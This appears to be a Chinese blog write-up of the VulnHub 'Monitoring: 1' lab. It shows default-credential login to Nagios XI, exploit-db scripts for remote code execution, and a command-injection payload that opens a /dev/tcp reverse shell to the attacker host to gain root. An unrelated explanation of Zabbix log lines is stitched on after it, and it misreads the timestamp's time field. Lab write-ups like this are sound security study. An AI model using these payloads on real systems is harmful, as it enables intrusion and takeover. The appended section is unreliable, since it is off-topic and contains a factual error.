vulnhub Monitoring: 1

渗透思路:

nmap扫描 ---- 默认用户名+弱密码登录Nagios XI ---- 利用Nagios XI 5.6.5的RCE漏洞获得root的shell

环境信息:

靶机:192.168.101.84

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.84

扫描到端口22、25、80、389、443、5667

2、默认用户名+弱密码登录Nagios XI

浏览器访问http://192.168.101.84/,发现是Nagios XI。

点击上图中的Access Nagios XI按钮,来到登录页面http://192.168.101.84/nagiosxi/login.php?redirect=/nagiosxi/index.php%3f&noauth=1

在网上查到Nagios XI的默认用户是nagiosadmin,尝试使用该用户和常见弱密码登录,发现该用户的密码是弱密码admin

成功登录后,发现Nagios XI版本是Nagios XI 5.6.0

3、利用Nagios XI的RCE漏洞getshell(可以省略)

exploit-db上查找Nagios XI,找到exp:Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated) - PHP webapps Exploit

下载exp,并根据exp中的用法提示在攻击机上执行:

nc -nlvp 8888
python3 49422.py http://192.168.101.84 nagiosadmin admin 192.168.101.34 8888

即可在攻击机nc监听端口上获得靶机www-data用户的反弹shell

4、利用Nagios XI 5.6.5的RCE漏洞获得root的shell

靶机上执行sudo -l发现www-data可以在不输入密码的情况下以root身份执行8条命令,其中有4条和Nagios XI相关,另外4条用ls -al命令观察后发现当前用户都没有写权限,所以很可能提权还是和Nagios XI有关。

google上搜索“nagios xi privilege escalation”

首先在[R2] Nagios XI Multiple Vulnerabilities - Research Advisory | Tenable®查找到一个proof:

sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/0;/bin/bash -i >& /dev/tcp/192.168.101.34/4444 0>&1;'

尝试之后发现不好使,可能这个漏洞在靶机的版本上已经修复了。

然后又查找到和/usr/local/nagiosxi/html/includes/components/profile/getprofile.sh相关的一个exp:

Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation - PHP webapps Exploit

这个exp真是能用而不好用,愁死我了-_-|||

用法是,攻击机上nc监听某个端口,比如8888

然后执行:

php 47299.php --host=192.168.101.84 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.101.34 --reverseport=8888

我在执行过程中总共遇到3个问题

1、Call to undefined function curl_init()

2、cookie.txt already exists - delete prior to running

3、PHP Fatal error: Uncaught Error: Class "DOMDocument" not found in /home/kali/47299.php:51

解决方法分别如下:

问题一:

sudo apt-get install php-curl

问题二:

注释掉exp中函数checkCookie()相关代码

问题三:

sudo apt-get install php-dom

成功执行exp后,攻击机nc监听端口获得靶机root用户反弹shell,并在/root下找到proof.txt

### 第一行 ```plaintext 3751:20251212:164110.534 ****** Enabled features ****** ``` - `3751`:通常是进程ID,用于标识正在运行该程序的特定进程。 - `20251212:164110.534`:这是一个时间戳,格式可能是自定义的,推测`20251212`代表日期(2025年12月12日),`164110.534`代表时间(16时4110.534秒)。 - `****** Enabled features ******`:这是一个提示信息,表明接下来要列出系统中已启用的功能。 ### 后续各行 ```plaintext 3751:20251212:164110.534 SNMP monitoring: YES ``` - 同样,`3751`是进程ID,`20251212:164110.534`是时间戳。 - `SNMP monitoring`:表示简单网络管理协议监控功能。SNMP监控原理是通过SNMP协议查询网络设备上的MIB(管理信息库),设备运行SNMP代理,Prometheus通过SNMP Exporter轮询这些设备,SNMP Exporter会翻译SNMP协议的数据为Prometheus的时间序列格式,供Prometheus采集和存储 [^1]。 - `YES`:表明SNMP监控功能已启用。 ```plaintext 3751:20251212:164110.534 IPMI monitoring: YES ``` - `IPMI monitoring`:智能平台管理接口监控功能,可用于服务器的带外管理,在zabbix 4.0上可使用该方式监控IBM X3650 M3服务器等 [^3]。 - `YES`:表示IPMI监控功能已启用。 ```plaintext 3751:20251212:164110.534 Web monitoring: YES ``` - `Web monitoring`:Web监控功能,用于监控Web服务的状态、性能等。 - `YES`:说明Web监控功能已启用。 ```plaintext 3751:20251212:164110.535 VMware monitoring: YES ``` - `VMware monitoring`:VMware监控功能,用于监控VMware虚拟机环境的运行状态等。 - `YES`:意味着VMware监控功能已启用。 ```plaintext 3751:20251212:164110.535 SMTP authentication: YES ``` - `SMTP authentication`:简单邮件传输协议认证功能,用于在发送邮件时进行身份验证。 - `YES`:表示SMTP认证功能已启用。 ```plaintext 3751:20251212:164110.535 ODBC: NO ``` - `ODBC`:开放数据库连接,是一种用于访问数据库的标准接口。 - `NO`:说明ODBC功能未启用。 ```plaintext 3751:20251212:164110.535 SSH support: YES ``` - `SSH support`:安全外壳协议支持,用于安全地远程登录和管理系统。 - `YES`:表示SSH支持功能已启用。 ```plaintext 3751:20251212:164110.535 IPv6 support: NO ``` - `IPv6 support`:IPv6支持功能,用于支持IPv6网络协议。 - `NO`:说明IPv6支持功能未启用。 ```plaintext 3751:20251212:164110.535 TLS support: YES ``` - `TLS support`:传输层安全协议支持,用于在网络通信中提供加密和身份验证。 - `YES`:表示TLS支持功能已启用。 ```plaintext 3751:20251212:164110.535 ****************************** ``` - 这是一个分隔符,用于结束已启用功能的列表显示。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值